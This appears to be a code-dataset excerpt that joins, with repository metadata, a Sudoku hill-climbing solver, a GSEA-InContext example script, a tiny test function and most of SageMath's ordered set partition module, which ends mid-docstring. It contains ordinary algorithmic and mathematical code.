current_total_conflicts = countconflicts(gv_init, gv_current)
best_total_conflicts = current_total_conflicts
while True: # Loop until a local optimum (or a solution) is found
for pair in set_of_swappable_pairs:
test_puzzle = gv_current.copy()
test_puzzle[pair[0]], test_puzzle[pair[1]] = gv_current[pair[1]], gv_current[pair[0]] # swap the 2 values
if countconflicts(gv_init, test_puzzle) < best_total_conflicts: # found a better candidate
best_total_conflicts = countconflicts(gv_init, test_puzzle)
best_puzzle = test_puzzle
if best_total_conflicts == current_total_conflicts: # no improvement (local maximum or solution)
if print_display != 'nothing': print(
f"FINAL SOLUTION: found maximum with {best_total_conflicts} conflicts.")
return gv_current
else: # will try to improve
if print_display != 'nothing': print(f"Swapping{pair} and total conflicts is now {best_total_conflicts}")
if print_display == 'all solution grids': displaygridv(gv_init, best_puzzle)
gv_current = best_puzzle
current_total_conflicts = best_total_conflicts
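# --- Illustrative sketch (not part of the original solver) ---------------------
# The routine above is steepest-descent hill climbing on the number of conflicts:
# evaluate every allowed swap, keep the single best one, stop at a local optimum.
# The toy below applies the same loop to sorting a short list by adjacent swaps,
# where the "conflicts" are the out-of-order pairs; the list and the function
# name are made up.
def _hill_climb_sort_demo(values):
    def conflicts(v):
        return sum(1 for i in range(len(v)) for j in range(i + 1, len(v)) if v[i] > v[j])
    current = list(values)
    while True:
        best, best_score = current, conflicts(current)
        for i in range(len(current) - 1):
            candidate = current[:]
            candidate[i], candidate[i + 1] = candidate[i + 1], candidate[i]
            if conflicts(candidate) < best_score:
                best, best_score = candidate, conflicts(candidate)
        if best is current:  # no improving swap left: local optimum (here also global)
            return current
        current = best
# Example: _hill_climb_sort_demo([3, 1, 2]) returns [1, 2, 3] after two improving swaps.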
################ Utilities ################
def some(seq):
"Return some element of seq that is true."
for e in seq:
if e: return e
return False
def from_file(filename, sep='\n'):
"Parse a file into a list of strings, separated by sep."
return open(filename).read().strip().split(sep)
def shuffled(seq):
"Return a randomly shuffled copy of the input sequence."
seq = list(seq)
random.shuffle(seq)
return seq
################ System test ################
import time, random
def solve_all(grids, name='', showif=0.0, searchMethod='ToSpecify'):
"""Attempt to solve a sequence of grids. Report results.
When showif is a number of seconds, display puzzles that take longer.
When showif is None, don't display any puzzles."""
def time_solve(grid):
# start = time.clock()
start = time.process_time()
if searchMethod == 'Hill Climbing':
gv_init, gv_current = solve_grid_values(grid, searchMethod)
else:
values = solve(grid, searchMethod)
t = time.process_time() - start
#
## Display puzzles that take long enough
if showif is not None and t > showif:
if searchMethod == 'Hill Climbing':
displaygridv(gv_init, gv_current)
else:
display(grid_values(grid))
if values: display(values)
print('(%.2f seconds)\n' % t)
if searchMethod == 'Hill Climbing':
return (t, is_solved(gv_init, gv_current))
else:
return (t, solved(values))
times, results = zip(*[time_solve(grid) for grid in grids])
N = len(grids)
# Will avoid division by zero if time is too short (0.0).
if sum(times) != 0.0:
hz = N / sum(times)
else:
hz = 999
if N >= 1:
print("Solved %d of %d %s puzzles in %.2f secs (avg %.2f secs (%d Hz), max %.2f secs). - %s" % (
sum(results), N, name, sum(times), sum(times) / N, hz, max(times), searchMethod))
def solved(values):
"A puzzle is solved if each unit is a permutation of the digits 1 to 9."
def unitsolved(unit): return set(values[s] for s in unit) == set(digits)
return values is not False and all(unitsolved(unit) for unit in unitlist)
################ Main routine ################
if __name__ == '__main__':
test()
# Demo one sudoku with display of each step
grid2 = '4.....8.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'
print_display_old = print_display
print_display = "all solution grids"
solve_grid_values(grid2, 'Hill Climbing')
print_display = print_display_old
# Test with different files
solve_all(from_file("1puzzle.txt"), "1puzzle", 9.0, 'Hill Climbing')
solve_all(from_file("easy50.txt"), "easy50 ", 9.0, 'Hill Climbing')
# solve_all(from_file("top95.txt"), "top95 ", 9.0, 'Hill Climbing')
# solve_all(from_file("hardest.txt"), "hardest", 9.0, 'Hill Climbing')
# solve_all(from_file("100sudoku.txt"), "100puz ", 9.0, 'Hill Climbing')
# solve_all(from_file("1000sudoku.txt"), "1000puz", 9.0, 'Hill Climbing')
# solve_all(from_file("NakedPair.txt"), "NakedPT", 9.0, 'Hill Climbing')
## References used:
## http://www.scanraid.com/BasicStrategies.htm
## http://www.sudokudragon.com/sudokustrategy.htm
## http://www.krazydad.com/blog/2005/09/29/an-index-of-sudoku-strategies/
## http://www2.warwick.ac.uk/fac/sci/moac/currentstudents/peter_cock/python/sudoku/
## https://www.sudokuoftheday.com/techniques/naked-pairs-triples/
| 48.545455
| 166
| 0.606554
|
b9dc9214f12464dc4c36c9d7c0f322f6c8f3f8d2
| 670
|
py
|
Python
|
run_example.py
|
CostelloLab/GSEA-InContext_noTk
|
ee1a845cc978cb0da8d296b51e3f36dc26234a63
|
[
"MIT"
] | null | null | null |
run_example.py
|
CostelloLab/GSEA-InContext_noTk
|
ee1a845cc978cb0da8d296b51e3f36dc26234a63
|
[
"MIT"
] | null | null | null |
run_example.py
|
CostelloLab/GSEA-InContext_noTk
|
ee1a845cc978cb0da8d296b51e3f36dc26234a63
|
[
"MIT"
] | null | null | null |
import gsea_incontext_notk
import sys, logging
rnk = "GSE4773_DEG_Expt1_Control_vs_Group1_gene.rnk"
# Run GSEA preranked - Hallmarks
#prerank_results = gsea_incontext_notk.prerank(
# rnk='data/rnk_lists/' + rnk,
# gene_sets='data/gene_sets/hallmarks.gmt',
# outdir='out/Prerank_Hallmarks/' + rnk[:-4],
# permutation_num=100,
# processes=4
#)
# Run GSEA-InContext - Hallmarks
gseapen_results = gsea_incontext_notk.incontext(
rnk='data/rnk_lists/' + rnk,
gene_sets='data/gene_sets/hallmarks.gmt',
background_rnks='data/bg_rnk_lists/all_442_lists_permuted_x100.csv',
outdir='out/InContext_Hallmarks/' + rnk[:-4],
permutation_num=100,
processes=4
)
print('Done!')
| 25.769231
| 69
| 0.768657
|
6732e29e140b176a2682f7332434edddea3153fa
| 34
|
py
|
Python
|
player/clues.py
|
jzlou/auto-hanabi
|
ad580a5d9a5d5a487bafcbfd97b88a3dc71632ef
|
[
"MIT"
] | 2
|
2018-12-14T10:39:41.000Z
|
2021-04-28T16:03:47.000Z
|
player/clues.py
|
jzlou/auto-hanabi
|
ad580a5d9a5d5a487bafcbfd97b88a3dc71632ef
|
[
"MIT"
] | null | null | null |
player/clues.py
|
jzlou/auto-hanabi
|
ad580a5d9a5d5a487bafcbfd97b88a3dc71632ef
|
[
"MIT"
] | null | null | null |
def test():
print("it worked!")
| 11.333333
| 21
| 0.588235
|
70408ad52f12f33cb93617a2f77728545b754fef
| 46,692
|
py
|
Python
|
src/sage/combinat/set_partition_ordered.py
|
fchapoton/sage
|
765c5cb3e24dd134708eca97e4c52e0221cd94ba
|
[
"BSL-1.0"
] | 1
|
2020-08-30T04:27:27.000Z
|
2020-08-30T04:27:27.000Z
|
src/sage/combinat/set_partition_ordered.py
|
fchapoton/sage
|
765c5cb3e24dd134708eca97e4c52e0221cd94ba
|
[
"BSL-1.0"
] | null | null | null |
src/sage/combinat/set_partition_ordered.py
|
fchapoton/sage
|
765c5cb3e24dd134708eca97e4c52e0221cd94ba
|
[
"BSL-1.0"
] | 1
|
2020-07-23T10:40:14.000Z
|
2020-07-23T10:40:14.000Z
|
r"""
Ordered Set Partitions
AUTHORS:
- Mike Hansen
- MuPAD-Combinat developers (for algorithms and design inspiration)
- Travis Scrimshaw (2013-02-28): Removed ``CombinatorialClass`` and added
entry point through :class:`OrderedSetPartition`.
"""
#*****************************************************************************
# Copyright (C) 2007 Mike Hansen <mhansen@gmail.com>,
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# https://www.gnu.org/licenses/
#*****************************************************************************
from six import add_metaclass
from sage.arith.all import factorial
from sage.sets.set import Set, Set_generic
from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets
from sage.categories.infinite_enumerated_sets import InfiniteEnumeratedSets
from sage.sets.finite_enumerated_set import FiniteEnumeratedSet
from sage.misc.inherit_comparison import InheritComparisonClasscallMetaclass
from sage.misc.all import prod
from sage.structure.parent import Parent
from sage.structure.element import parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.structure.list_clone import ClonableArray
from sage.structure.richcmp import richcmp
from sage.rings.integer import Integer
from sage.rings.integer_ring import ZZ
from sage.combinat.combinatorial_map import combinatorial_map
from sage.combinat.combinat import stirling_number2
from sage.combinat.composition import Composition, Compositions
from sage.combinat.words.words import Words
from sage.combinat.words.finite_word import FiniteWord_class
import sage.combinat.permutation as permutation
from functools import reduce
from sage.categories.cartesian_product import cartesian_product
@add_metaclass(InheritComparisonClasscallMetaclass)
class OrderedSetPartition(ClonableArray):
r"""
An ordered partition of a set.
An ordered set partition `p` of a set `s` is a list of pairwise
disjoint nonempty subsets of `s` such that the union of these
subsets is `s`. These subsets are called the parts of the partition.
We represent an ordered set partition as a list of sets. By
extension, an ordered set partition of a nonnegative integer `n` is
the set partition of the integers from `1` to `n`. The number of
ordered set partitions of `n` is called the `n`-th ordered Bell
number.
There is a natural integer composition associated with an ordered
set partition, that is the sequence of sizes of all its parts in
order.
The number `T_n` of ordered set partitions of
`\{ 1, 2, \ldots, n \}` is the so-called `n`-th *Fubini number*
(also known as the `n`-th ordered Bell number; see
:wikipedia:`Ordered Bell number`). Its exponential generating
function is
.. MATH::
\sum_n {T_n \over n!} x^n = {1 \over 2-e^x}.
(See sequence A000670 in OEIS.)
INPUT:
- ``parts`` -- an object or iterable that defines an ordered set partition
(e.g., a list of pairwise disjoint sets) or a packed word (e.g., a list
of letters on some alphabet). If there is ambiguity and if the input should
be treated as a packed word, the keyword ``from_word`` should be used.
EXAMPLES:
There are 13 ordered set partitions of `\{1,2,3\}`::
sage: OrderedSetPartitions(3).cardinality()
13
Here is the list of them::
sage: OrderedSetPartitions(3).list()
[[{1}, {2}, {3}],
[{1}, {3}, {2}],
[{2}, {1}, {3}],
[{3}, {1}, {2}],
[{2}, {3}, {1}],
[{3}, {2}, {1}],
[{1}, {2, 3}],
[{2}, {1, 3}],
[{3}, {1, 2}],
[{1, 2}, {3}],
[{1, 3}, {2}],
[{2, 3}, {1}],
[{1, 2, 3}]]
There are 12 ordered set partitions of `\{1,2,3,4\}` whose underlying
composition is `[1,2,1]`::
sage: OrderedSetPartitions(4,[1,2,1]).list()
[[{1}, {2, 3}, {4}],
[{1}, {2, 4}, {3}],
[{1}, {3, 4}, {2}],
[{2}, {1, 3}, {4}],
[{2}, {1, 4}, {3}],
[{3}, {1, 2}, {4}],
[{4}, {1, 2}, {3}],
[{3}, {1, 4}, {2}],
[{4}, {1, 3}, {2}],
[{2}, {3, 4}, {1}],
[{3}, {2, 4}, {1}],
[{4}, {2, 3}, {1}]]
Since :trac:`14140`, we can create an ordered set partition directly by
:class:`OrderedSetPartition` which creates the parent object by taking the
union of the partitions passed in. However it is recommended and
(marginally) faster to create the parent first and then create the ordered
set partition from that. ::
sage: s = OrderedSetPartition([[1,3],[2,4]]); s
[{1, 3}, {2, 4}]
sage: s.parent()
Ordered set partitions of {1, 2, 3, 4}
We can construct the ordered set partition from a word,
which we consider as packed::
sage: OrderedSetPartition([2,4,1,2])
[{3}, {1, 4}, {2}]
sage: OrderedSetPartition(from_word=[2,4,1,2])
[{3}, {1, 4}, {2}]
sage: OrderedSetPartition(from_word='bdab')
[{3}, {1, 4}, {2}]
REFERENCES:
:wikipedia:`Ordered_partition_of_a_set`
"""
@staticmethod
def __classcall_private__(cls, parts=None, from_word=None):
"""
Create a set partition from ``parts`` with the appropriate parent.
EXAMPLES::
sage: s = OrderedSetPartition([[1,3],[2,4]]); s
[{1, 3}, {2, 4}]
sage: s.parent()
Ordered set partitions of {1, 2, 3, 4}
sage: t = OrderedSetPartition([[2,4],[1,3]]); t
[{2, 4}, {1, 3}]
sage: s != t
True
sage: OrderedSetPartition()
[]
sage: OrderedSetPartition([])
[]
sage: OrderedSetPartition('')
[]
sage: OrderedSetPartition('bdab') == OrderedSetPartition(from_word='bdab')
True
sage: OrderedSetPartition('bdab') == OrderedSetPartition(Word('bdab'))
True
"""
if parts is None and from_word is None:
P = OrderedSetPartitions([])
return P.element_class(P, [])
if from_word:
return OrderedSetPartitions().from_finite_word(Words()(from_word))
# if `parts` looks like a sequence of "letters" then treat it like a word.
if parts in Words() or (len(parts) > 0 and (parts[0] in ZZ or isinstance(parts[0], str))):
return OrderedSetPartitions().from_finite_word(Words()(parts))
else:
P = OrderedSetPartitions( reduce(lambda x,y: x.union(y), map(Set, parts), Set([])) )
return P.element_class(P, parts)
def __init__(self, parent, s):
"""
Initialize ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: s = OS([[1, 3], [2, 4]])
sage: TestSuite(s).run()
"""
self._base_set = reduce(lambda x,y: x.union(y), map(Set, s), Set([]))
ClonableArray.__init__(self, parent, [Set(_) for _ in s])
def _repr_(self):
"""
Return a string representation of ``self``.
.. TODO::
Sort the repr output of Sage's :class:`Set` and remove
this method.
EXAMPLES::
sage: OrderedSetPartition([[1,3],[2,4]])
[{1, 3}, {2, 4}]
"""
return '[' + ', '.join(('{' + repr(sorted(x))[1:-1] + '}' for x in self)) + ']'
def check(self):
"""
Check that we are a valid ordered set partition.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: s = OS([[1, 3], [2, 4]])
sage: s.check()
"""
assert self in self.parent(), "%s not in %s" % (self, self.parent())
def _hash_(self):
"""
Return the hash of ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: s = OS([[1, 3], [2, 4]])
sage: OSP = OrderedSetPartitions()
sage: hash(s) == hash(OSP(s))
True
"""
return hash(tuple(self))
def base_set(self):
"""
Return the base set of ``self``, which is the union of all parts
of ``self``.
EXAMPLES::
sage: OrderedSetPartition([[1], [2,3], [4]]).base_set()
{1, 2, 3, 4}
sage: OrderedSetPartition([[1,2,3,4]]).base_set()
{1, 2, 3, 4}
sage: OrderedSetPartition([]).base_set()
{}
"""
return Set([e for p in self for e in p])
def base_set_cardinality(self):
"""
Return the cardinality of the base set of ``self``, which is the sum
of the sizes of the parts of ``self``.
This is also known as the *size* (sometimes the *weight*) of
an ordered set partition.
EXAMPLES::
sage: OrderedSetPartition([[1], [2,3], [4]]).base_set_cardinality()
4
sage: OrderedSetPartition([[1,2,3,4]]).base_set_cardinality()
4
"""
return sum(len(x) for x in self)
size = base_set_cardinality
def length(self):
r"""
Return the number of parts of ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: s = OS([[1, 3], [2, 4]])
sage: s.length()
2
"""
return len(self)
@combinatorial_map(name='to composition')
def to_composition(self):
r"""
Return the integer composition whose parts are the sizes of the sets
in ``self``.
EXAMPLES::
sage: S = OrderedSetPartitions(5)
sage: x = S([[3,5,4], [1, 2]])
sage: x.to_composition()
[3, 2]
sage: y = S([[3,1], [2], [5,4]])
sage: y.to_composition()
[2, 1, 2]
"""
return Composition([len(p) for p in self])
@staticmethod
def sum(osps):
"""
Return the concatenation of the given ordered set partitions
``osps`` (provided they have no elements in common).
INPUT:
- ``osps`` -- a list (or iterable) of ordered set partitions
EXAMPLES::
sage: OrderedSetPartition.sum([OrderedSetPartition([[4, 1], [3]]), OrderedSetPartition([[7], [2]]), OrderedSetPartition([[5, 6]])])
[{1, 4}, {3}, {7}, {2}, {5, 6}]
Any iterable can be provided as input::
sage: Composition.sum([OrderedSetPartition([[2*i,2*i+1]]) for i in [4,1,3]])
[{8, 9}, {2, 3}, {6, 7}]
Empty inputs are handled gracefully::
sage: OrderedSetPartition.sum([]) == OrderedSetPartition([])
True
TESTS::
sage: A = OrderedSetPartitions(3)([[2], [1, 3]])
sage: B = OrderedSetPartitions([5])([[5]])
sage: C = OrderedSetPartition.sum([A, B]); C
[{2}, {1, 3}, {5}]
sage: C.parent()
Ordered set partitions
"""
return OrderedSetPartitions()(sum((list(i) for i in osps), []))
def reversed(self):
r"""
Return the reversal of the ordered set partition ``self``.
The *reversal* of an ordered set partition
`(P_1, P_2, \ldots, P_k)` is defined to be the ordered
set partition `(P_k, P_{k-1}, \ldots, P_1)`.
EXAMPLES::
sage: OrderedSetPartition([[1, 3], [2]]).reversed()
[{2}, {1, 3}]
sage: OrderedSetPartition([[1, 5], [2, 4]]).reversed()
[{2, 4}, {1, 5}]
sage: OrderedSetPartition([[-1], [-2], [3, 4], [0]]).reversed()
[{0}, {3, 4}, {-2}, {-1}]
sage: OrderedSetPartition([]).reversed()
[]
"""
par = parent(self)
return par(list(reversed(list(self))))
def complement(self):
r"""
Return the complement of the ordered set partition ``self``.
This assumes that ``self`` is an ordered set partition of
an interval of `\ZZ`.
Let `(P_1, P_2, \ldots, P_k)` be an ordered set partition
of some interval `I` of `\ZZ`. Let `\omega` be the unique
strictly decreasing bijection `I \to I`. Then, the
*complement* of `(P_1, P_2, \ldots, P_k)` is defined to be
the ordered set partition
`(\omega(P_1), \omega(P_2), \ldots, \omega(P_k))`.
EXAMPLES::
sage: OrderedSetPartition([[1, 2], [3]]).complement()
[{2, 3}, {1}]
sage: OrderedSetPartition([[1, 3], [2]]).complement()
[{1, 3}, {2}]
sage: OrderedSetPartition([[2, 3]]).complement()
[{2, 3}]
sage: OrderedSetPartition([[1, 5], [2, 3], [4]]).complement()
[{1, 5}, {3, 4}, {2}]
sage: OrderedSetPartition([[-1], [-2], [1, 2], [0]]).complement()
[{1}, {2}, {-2, -1}, {0}]
sage: OrderedSetPartition([]).complement()
[]
"""
if len(self) <= 1:
return self
base_set = self.base_set()
m = min(base_set)
M = max(base_set)
mM = m + M
return OrderedSetPartitions()([[mM - i for i in part] for part in self])
def finer(self):
"""
Return the set of ordered set partitions which are finer
than ``self``.
See :meth:`is_finer` for the definition of "finer".
EXAMPLES::
sage: C = OrderedSetPartition([[1, 3], [2]]).finer()
sage: C.cardinality()
3
sage: C.list()
[[{1}, {3}, {2}], [{3}, {1}, {2}], [{1, 3}, {2}]]
sage: OrderedSetPartition([]).finer()
{[]}
sage: W = OrderedSetPartition([[4, 9], [-1, 2]])
sage: W.finer().list()
[[{9}, {4}, {2}, {-1}],
[{9}, {4}, {-1}, {2}],
[{9}, {4}, {-1, 2}],
[{4}, {9}, {2}, {-1}],
[{4}, {9}, {-1}, {2}],
[{4}, {9}, {-1, 2}],
[{4, 9}, {2}, {-1}],
[{4, 9}, {-1}, {2}],
[{4, 9}, {-1, 2}]]
"""
par = parent(self)
if not self:
return FiniteEnumeratedSet([self])
else:
return FiniteEnumeratedSet([par(sum((list(i) for i in C), []))
for C in cartesian_product([OrderedSetPartitions(X) for X in self])])
def is_finer(self, co2):
"""
Return ``True`` if the ordered set partition ``self`` is finer
than the ordered set partition ``co2``; otherwise, return ``False``.
If `A` and `B` are two ordered set partitions of the same set,
then `A` is said to be *finer* than `B` if `B` can be obtained
from `A` by (repeatedly) merging consecutive parts.
In this case, we say that `B` is *fatter* than `A`.
EXAMPLES::
sage: A = OrderedSetPartition([[1, 3], [2]])
sage: B = OrderedSetPartition([[1], [3], [2]])
sage: A.is_finer(B)
False
sage: B.is_finer(A)
True
sage: C = OrderedSetPartition([[3], [1], [2]])
sage: A.is_finer(C)
False
sage: C.is_finer(A)
True
sage: OrderedSetPartition([[2], [5], [1], [4]]).is_finer(OrderedSetPartition([[2, 5], [1, 4]]))
True
sage: OrderedSetPartition([[5], [2], [1], [4]]).is_finer(OrderedSetPartition([[2, 5], [1, 4]]))
True
sage: OrderedSetPartition([[2], [1], [5], [4]]).is_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
sage: OrderedSetPartition([[2, 5, 1], [4]]).is_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
"""
co1 = self
if co1.base_set() != co2.base_set():
raise ValueError("ordered set partitions self (= %s) and co2 (= %s) must be of the same set"%(self, co2))
i1 = 0
for j2 in co2:
sum1 = Set([])
while len(sum1) < len(j2):
sum1 += co1[i1]
i1 += 1
if not sum1.issubset(j2):
return False
return True
def fatten(self, grouping):
r"""
Return the ordered set partition fatter than ``self``, obtained
by grouping together consecutive parts according to the integer
composition ``grouping``.
See :meth:`finer` for the definition of "fatter".
INPUT:
- ``grouping`` -- a composition whose sum is the length of ``self``
EXAMPLES:
Let us start with the ordered set partition::
sage: c = OrderedSetPartition([[2, 5], [1], [3, 4]])
With ``grouping`` equal to `(1, \ldots, 1)`, `c` is left unchanged::
sage: c.fatten(Composition([1,1,1]))
[{2, 5}, {1}, {3, 4}]
With ``grouping`` equal to `(\ell)` where `\ell` is the length of
`c`, this yields the coarsest ordered set partition above `c`::
sage: c.fatten(Composition([3]))
[{1, 2, 3, 4, 5}]
Other values for ``grouping`` yield (all the) other ordered
set partitions coarser than `c`::
sage: c.fatten(Composition([2,1]))
[{1, 2, 5}, {3, 4}]
sage: c.fatten(Composition([1,2]))
[{2, 5}, {1, 3, 4}]
TESTS::
sage: OrderedSetPartition([]).fatten(Composition([]))
[]
sage: c.fatten(Composition([2,1])).__class__ == c.__class__
True
"""
result = [None] * len(grouping)
j = 0
for i in range(len(grouping)):
result[i] = sum(self[j:j+grouping[i]], Set([]))
j += grouping[i]
return parent(self)(result)
def fatter(self):
"""
Return the set of ordered set partitions which are fatter
than ``self``.
See :meth:`finer` for the definition of "fatter".
EXAMPLES::
sage: C = OrderedSetPartition([[2, 5], [1], [3, 4]]).fatter()
sage: C.cardinality()
4
sage: sorted(C)
[[{1, 2, 3, 4, 5}],
[{1, 2, 5}, {3, 4}],
[{2, 5}, {1, 3, 4}],
[{2, 5}, {1}, {3, 4}]]
sage: OrderedSetPartition([[4, 9], [-1, 2]]).fatter().list()
[[{4, 9}, {-1, 2}], [{-1, 2, 4, 9}]]
Some extreme cases::
sage: list(OrderedSetPartition([[5]]).fatter())
[[{5}]]
sage: list(Composition([]).fatter())
[[]]
sage: sorted(OrderedSetPartition([[1], [2], [3], [4]]).fatter())
[[{1, 2, 3, 4}],
[{1, 2, 3}, {4}],
[{1, 2}, {3, 4}],
[{1, 2}, {3}, {4}],
[{1}, {2, 3, 4}],
[{1}, {2, 3}, {4}],
[{1}, {2}, {3, 4}],
[{1}, {2}, {3}, {4}]]
"""
return Compositions(len(self)).map(self.fatten)
@staticmethod
def bottom_up_osp(X, comp):
r"""
Return the ordered set partition obtained by listing the
elements of the set ``X`` in increasing order, and
placing bars between some of them according to the
integer composition ``comp`` (namely, the bars are placed
in such a way that the lengths of the resulting blocks are
exactly the entries of ``comp``).
INPUT:
- ``X`` -- a finite set (or list or tuple)
- ``comp`` -- a composition whose sum is the size of ``X``
(can be given as a list or tuple or composition)
EXAMPLES::
sage: buo = OrderedSetPartition.bottom_up_osp
sage: buo(Set([1, 4, 7, 9]), [2, 1, 1])
[{1, 4}, {7}, {9}]
sage: buo(Set([1, 4, 7, 9]), [1, 3])
[{1}, {4, 7, 9}]
sage: buo(Set([1, 4, 7, 9]), [1, 1, 1, 1])
[{1}, {4}, {7}, {9}]
sage: buo(range(8), [1, 4, 2, 1])
[{0}, {1, 2, 3, 4}, {5, 6}, {7}]
sage: buo([], [])
[]
TESTS::
sage: buo = OrderedSetPartition.bottom_up_osp
sage: parent(buo(Set([1, 4, 7, 9]), [2, 1, 1]))
Ordered set partitions
sage: buo((3, 5, 6), (2, 1))
[{3, 5}, {6}]
sage: buo([3, 5, 6], Composition([1, 2]))
[{3}, {5, 6}]
"""
xs = sorted(X)
result = [None] * len(comp)
j = 0
for i in range(len(comp)):
result[i] = Set(xs[j:j+comp[i]])
j += comp[i]
return OrderedSetPartitions()(result)
def strongly_finer(self):
"""
Return the set of ordered set partitions which are strongly
finer than ``self``.
See :meth:`is_strongly_finer` for the definition of "strongly
finer".
EXAMPLES::
sage: C = OrderedSetPartition([[1, 3], [2]]).strongly_finer()
sage: C.cardinality()
2
sage: C.list()
[[{1}, {3}, {2}], [{1, 3}, {2}]]
sage: OrderedSetPartition([]).strongly_finer()
{[]}
sage: W = OrderedSetPartition([[4, 9], [-1, 2]])
sage: W.strongly_finer().list()
[[{4}, {9}, {-1}, {2}],
[{4}, {9}, {-1, 2}],
[{4, 9}, {-1}, {2}],
[{4, 9}, {-1, 2}]]
"""
par = parent(self)
if not self:
return FiniteEnumeratedSet([self])
else:
buo = OrderedSetPartition.bottom_up_osp
return FiniteEnumeratedSet([par(sum((list(P) for P in C), []))
for C in cartesian_product([[buo(X, comp) for comp in Compositions(len(X))] for X in self])])
def is_strongly_finer(self, co2):
r"""
Return ``True`` if the ordered set partition ``self`` is strongly
finer than the ordered set partition ``co2``; otherwise, return
``False``.
If `A` and `B` are two ordered set partitions of the same set,
then `A` is said to be *strongly finer* than `B` if `B` can be
obtained from `A` by (repeatedly) merging consecutive parts,
provided that every time we merge two consecutive parts `C_i`
and `C_{i+1}`, we have `\max C_i < \min C_{i+1}`.
In this case, we say that `B` is *strongly fatter* than `A`.
EXAMPLES::
sage: A = OrderedSetPartition([[1, 3], [2]])
sage: B = OrderedSetPartition([[1], [3], [2]])
sage: A.is_strongly_finer(B)
False
sage: B.is_strongly_finer(A)
True
sage: C = OrderedSetPartition([[3], [1], [2]])
sage: A.is_strongly_finer(C)
False
sage: C.is_strongly_finer(A)
False
sage: OrderedSetPartition([[2], [5], [1], [4]]).is_strongly_finer(OrderedSetPartition([[2, 5], [1, 4]]))
True
sage: OrderedSetPartition([[5], [2], [1], [4]]).is_strongly_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
sage: OrderedSetPartition([[2], [1], [5], [4]]).is_strongly_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
sage: OrderedSetPartition([[2, 5, 1], [4]]).is_strongly_finer(OrderedSetPartition([[2, 5], [1, 4]]))
False
"""
co1 = self
if co1.base_set() != co2.base_set():
raise ValueError("ordered set partitions self (= %s) and co2 (= %s) must be of the same set" % (self, co2))
i1 = 0
for j2 in co2:
sum1 = Set([])
while len(sum1) < len(j2):
next = co1[i1]
if sum1 and max(sum1) >= min(next):
return False
sum1 += next
i1 += 1
if not sum1.issubset(j2):
return False
return True
def strongly_fatter(self):
"""
Return the set of ordered set partitions which are strongly fatter
than ``self``.
See :meth:`strongly_finer` for the definition of "strongly fatter".
EXAMPLES::
sage: C = OrderedSetPartition([[2, 5], [1], [3, 4]]).strongly_fatter()
sage: C.cardinality()
2
sage: sorted(C)
[[{2, 5}, {1, 3, 4}],
[{2, 5}, {1}, {3, 4}]]
sage: OrderedSetPartition([[4, 9], [-1, 2]]).strongly_fatter().list()
[[{4, 9}, {-1, 2}]]
Some extreme cases::
sage: list(OrderedSetPartition([[5]]).strongly_fatter())
[[{5}]]
sage: list(OrderedSetPartition([]).strongly_fatter())
[[]]
sage: sorted(OrderedSetPartition([[1], [2], [3], [4]]).strongly_fatter())
[[{1, 2, 3, 4}],
[{1, 2, 3}, {4}],
[{1, 2}, {3, 4}],
[{1, 2}, {3}, {4}],
[{1}, {2, 3, 4}],
[{1}, {2, 3}, {4}],
[{1}, {2}, {3, 4}],
[{1}, {2}, {3}, {4}]]
sage: sorted(OrderedSetPartition([[1], [3], [2], [4]]).strongly_fatter())
[[{1, 3}, {2, 4}],
[{1, 3}, {2}, {4}],
[{1}, {3}, {2, 4}],
[{1}, {3}, {2}, {4}]]
sage: sorted(OrderedSetPartition([[4], [1], [5], [3]]).strongly_fatter())
[[{4}, {1, 5}, {3}], [{4}, {1}, {5}, {3}]]
"""
c = [sorted(X) for X in self]
l = len(c)
g = [-1] + [i for i in range(l-1) if c[i][-1] > c[i+1][0]] + [l-1]
# g lists the positions of the blocks that cannot be merged
# with their right neighbors.
subcomps = [OrderedSetPartition(c[g[i] + 1 : g[i+1] + 1]) for i in range(len(g)-1)]
# Now, self is the concatenation of the entries of subcomps.
        # We can fatten each of the ordered set partitions in subcomps
# arbitrarily, and then concatenate the results.
fattenings = [list(subcomp.fatter()) for subcomp in subcomps]
return FiniteEnumeratedSet([OrderedSetPartition(sum([list(gg) for gg in fattening], []))
for fattening in cartesian_product(fattenings)])
@combinatorial_map(name='to packed word')
def to_packed_word(self):
r"""
Return the packed word on alphabet `\{1,2,3,\ldots\}`
corresponding to ``self``.
A *packed word* on alphabet `\{1,2,3,\ldots\}` is any word whose
maximum letter is the same as its total number of distinct letters.
Let `P` be an ordered set partition of a set `X`.
The corresponding packed word `w_1 w_2 \cdots w_n` is constructed
by having letter `w_i = j` if the `i`-th smallest entry in `X`
occurs in the `j`-th block of `P`.
.. SEEALSO::
:meth:`Word.to_ordered_set_partition`
.. WARNING::
This assumes there is a total order on the underlying
set (``self._base_set``).
EXAMPLES::
sage: S = OrderedSetPartitions()
sage: x = S([[3,5], [2], [1,4,6]])
sage: x.to_packed_word()
word: 321313
sage: x = S([['a', 'c', 'e'], ['b', 'd']])
sage: x.to_packed_word()
word: 12121
"""
X = sorted(self._base_set)
out = {}
for i in range(len(self)):
for letter in self[i]:
out[letter] = i
return Words()([out[letter] + 1 for letter in X])
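# Illustrative cross-check (added note, not part of the original file): on the base
# set {1, ..., n} the packed word and the ordered set partition determine each other.
# For instance, the doctest above and the ``from_finite_word`` doctest further down
# agree: OrderedSetPartitions().from_finite_word([3, 2, 1, 3, 1, 3]) gives back
# [{3, 5}, {2}, {1, 4, 6}], whose ``to_packed_word`` is word: 321313.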
class OrderedSetPartitions(UniqueRepresentation, Parent):
"""
Return the combinatorial class of ordered set partitions of ``s``.
The optional argument ``c``, if specified, restricts the parts of
the partition to have certain sizes (the entries of ``c``).
EXAMPLES::
sage: OS = OrderedSetPartitions([1,2,3,4]); OS
Ordered set partitions of {1, 2, 3, 4}
sage: OS.cardinality()
75
sage: OS.first()
